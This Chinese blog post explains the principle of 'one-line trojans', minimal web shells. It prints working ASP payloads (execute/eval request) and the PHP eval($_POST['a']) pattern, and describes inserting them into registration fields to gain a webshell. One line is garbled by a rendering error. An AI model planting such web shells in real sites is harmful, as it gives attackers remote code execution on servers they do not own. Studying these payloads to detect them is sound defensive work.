一句话木马原理

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形,但本质是不变的:木马的函数执行了我们发送的命令。
黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:
<%execute request(“value”)%>
其中value是值,所以你可以更改自己的值,前面的request就是获取这个值
<%eval request(“value”)%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request(“value”)%>这个文件被插入到哪一个ASP文件里面就可以了。)
这就被称为一句话木马,它是基于B/S结构的。
在php语言中我们可以通过GET 、POST 、COOKIE 这三种方式向一个网站提交数据,一句话木马用
KaTeX parse error: Double superscript at position 8: _GET[' '̲]、_POST[’ ‘]、$_COOKIE[’ '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。
就像是这样:执行命令的函数(接收的数据)
在这里插入图片描述

其中eval就是执行命令的函数,$_POST[‘a’]就是接收的数据。eval函数把接收的数据当作php代码来执行。这样我们就能够让插了一句话木马的网站执行我们传递过去的任意php语句。这便是一句话木马的强大之处。

  • 5
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值